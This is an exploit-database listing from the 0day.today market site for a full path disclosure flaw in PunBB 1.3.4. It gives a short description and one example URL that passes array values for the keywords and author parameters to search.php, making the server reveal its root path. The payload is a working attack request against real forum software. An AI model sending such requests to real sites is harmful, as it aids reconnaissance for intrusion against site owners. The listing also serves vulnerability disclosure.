[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Punbb 1.3.4 Full Path Disclosure Vulnerability

Author
SYSTEM_OVERIDE
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14766
Category
web applications
Date add
08-11-2010
Platform
php
==============================================
Punbb 1.3.4 Full Path Disclosure Vulnerability
==============================================

# Exploit Title: Punbb 1.3.4 Full Path Disclosure
# Date: 07/11/2010
# Author: SYSTEM_OVERIDE, OverSecurityCrew
# Software Link: http://punbb.informer.com/
# Vulnerability Type: Full Path Disclosure
# Version: 1.3.4
 
 
Vulnerability Details:
 
The vulnerabilities are in the file and the file /search.php and /userlist.php not properly control the content of variables keywords and author.
An attacker can exploit this to find out the rootpath a website.
 
Example:
 
http://www.site.com/[path]/search.php?action=search&keywords[]=&author[]=&search_in=all&sort_by=0&SORT_DAshow_as=DESC&topics=&search=Submit+search



#  0day.today [2024-12-25]  #